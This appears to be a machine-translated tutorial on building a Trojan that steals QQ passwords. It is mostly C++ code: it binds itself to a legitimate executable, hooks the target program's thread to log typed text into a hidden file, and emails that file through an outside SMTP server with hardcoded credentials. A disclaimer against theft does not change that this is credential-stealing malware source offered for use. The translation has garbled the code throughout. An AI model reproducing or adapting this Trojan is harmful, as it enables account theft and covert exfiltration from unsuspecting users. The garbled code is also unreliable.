Do it yourself to do QQ Trojan ----- General
statement:
This article is only suitable for beginners, "Help" they will free from repeating bile practice, really make a thing they are interested. After all, in the boring programming world, interest still insists on moving forward, and also uncover the mystery of the online QQ password interception unit. Solemnly declare that I will announce that this article does not encourage everyone to steal the account password of others, so I only post some important techniques for the original code.
Not much nonsense, first introduce the ideas and use of this process.
1. Manually or automatically bind the target file, automatically break down the DLL and the original file and run.
The binding file technology used in this program is the most primitive, which will be easily broken by anti-virus software, the bound file structure is as follows:
Of course, you can also modify the PE file structure, insert the Trojan to step, the technical requirements are relatively high. (I haven't practicable, I have said it here)
2. Call your own DLL, set the message hook to the relevant thread running on the target file. Store intercepted text content in the specified file.
3. Send content from the specified file, send mail to the specified mailbox using ESMTP
Look at the production and running process of the program: (It is recommended to copy the graph to zoom in with ACDSee, the picture is done using Visio, doing the bad, laughing)
Description: setup.exe is the first file that is executed after the program is compiled.
Hook.dll is a dynamic connection library that exports the hook function
Server.exe is the setup.exe running after running the hook.dll's PE file, which can bind all files outside the DLL file.
123456.EXE is the content of the content decomposed by Temp.exe and the same PE file as Server.exe
Let's analyze the code of the main program:
IF (! AFXSocketinit ())
{
AFXMessageBox ("IDP_SOCKETS_INIT_FAILED");
Return False;
}
// Determine the operation mode of the program through the length of this document
CBINDFILE CURFILE;
IF (! curfile.initiate ()) // Main hub, will be detailed in the following binding file classes
Return True;
// acquire the decomposed PE file run process information
Process_information pi;
ZeromeMory (& Pi, SizeOf (PI));
Curfile.getrunfileProcessInfo (PI);
// Wait for the child process to enter the message loop
IF (0! = WaitforInputIdle (Pi.hprocess, Infinite))
{
Messagebox (NULL, "Waiting to enter the message loop error!", Null, null;
Return False;
}
// Start hook
HDLLModule = getModuleHandle ("hook.dll");
IF (null == hdllmodule)
{
HDLLModule = loadingLibrary ("hook.dll");
IF (null == hdllmodule)
{
MessageBox (NULL, "DLLModule Is Null," Print ", MB_OK;
Return False;
}
/ / Acquisite the address of the export function
Hook_start hook_start_address;
Hook_start_address = (hook_start) GetProcaddress (HDLLModule, "Hook_Start");
IF (null == hook_start_address) Return False;
IF (! (hook_start_address) (Pi.dwthreadID))
{
MessageBox (NULL, "Can Not Complete Hook!", NULL, NULL;
Return False;
}
}
// Waiting for the second file running of the divided file to end
DWORD dwaitingTime = 2 * 60 * 1000; // Waiting time is 2 minutes
WaitforsingleObject (Pi.hprocess, dwwaitingTime);
DWORD DWEXITCODE;
GetExitcodeProcess (pi.hprocess, & dwexitcode);
// 2 minutes later end hook
IF (NULL! = HDLLMODULE)
{
Hook_stop hook_stop_address;
Hook_stop_address = (hook_stop) getProcaddress (HDLLModule, "Hook_Stop");
IF (null == hook_stop_address)
{
:: freeElibrary (HDLLModule);
Return False;
}
(Hook_stop_address) ();
:: freeElibrary (HDLLModule);
}
//send email
Sendemail ();
// Delete the decomposed temporary file after running
IF (STILL_ACTIVE == DwExitcode)
{
WaitforsingleObject (pi.hprocess, infinite);
GetExitcodeProcess (pi.hprocess, & dwexitcode);
}
CloseHandle (pi.hthread);
CloseHandle (pi.hprocess);
DELETEFILE (CURFILE.GETSECFILEPATH ());
Return True;
Here is the Sendemail function
Bool csetupppp :: sendemail ()
{
Handle Hfile = NULL;
DWORD DWDUMMY = 0;
Bool Bresult = false;
TCHAR * LPFILESTRING = null; // File Data Buffer
DWORD dwfilesize = 0; // file length
Hfile = Createfile (file_path_name, generic_read,
File_share_read, null,
Open_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL
IF (Invalid_Handle_Value == HFILE)
Return False;
DWFILESIZE = GetFileSize (HFile, NULL);
LPFileString = New Tchar [DWFILESIZE 1];
IF (null == lpfilestring)
Return False;
ZeromeMory (lpfilestring, dwfilesis 1);
SetFilePointer (Hfile, 0, NULL, FILE_BEGIN);
BRESULT = Readfile (Hfile, LPFileString, DWFILESIZE, & DWDUMMY, NULL);
CloseHandle (HFILE);
IF (0! = lstrlen (lpfileString)) {
// Send a data file to the specified mailbox
Mailmsg mailmsg;
LSTRCPY (Mailmsg.mail_server_name, "SMTP.21CN.com");
Mailmsg.mail_server_port = 25;
LSTRCPY (Mailmsg.mail_account, "Zyfxyz");
LSTRCPY (Mailmsg.mail_Password, "12345678"); // It is best to use the encrypted string, // Otherwise, in the PE file .DATA section / / You can see your password
LSTRCPY (Mailmsg.mail_From_Address, "Zyfxyz@21cn.com");
LSTRCPY (Mailmsg.mail_to_Address, "Zyfxyz@21cn.com");
LSTRCPY (Mailmsg.mail_Subject, "Return");
ZeromeMory (Mailmsg.mail_Content, Sizeof (Mailmsg.mail_Content);
IF (dwfilesize> 800) // The DATA content of each time must not exceed 1000bytes
DWFILESIZE = 800;
LSTRCPYN (Mailmsg.mail_Content, LPFileString, DWFILESIZE 1);
CSMTP_FZ SMTP (Mailmsg);
IF (SMTP.SENDMAIL ())
{
// Remove the data file if it is successful
MessageBox (NULL, "Send Success, Delete Data File", NULL, NULL
DELETEFILE (file_path_name); // file_path_nam file deposition text data
}
}
delete [] lpfilestring;
Return True;
}
The following sections will explain the binding file classes CBINDFILE, mail send class CSMTP_FZ and hook.dll.
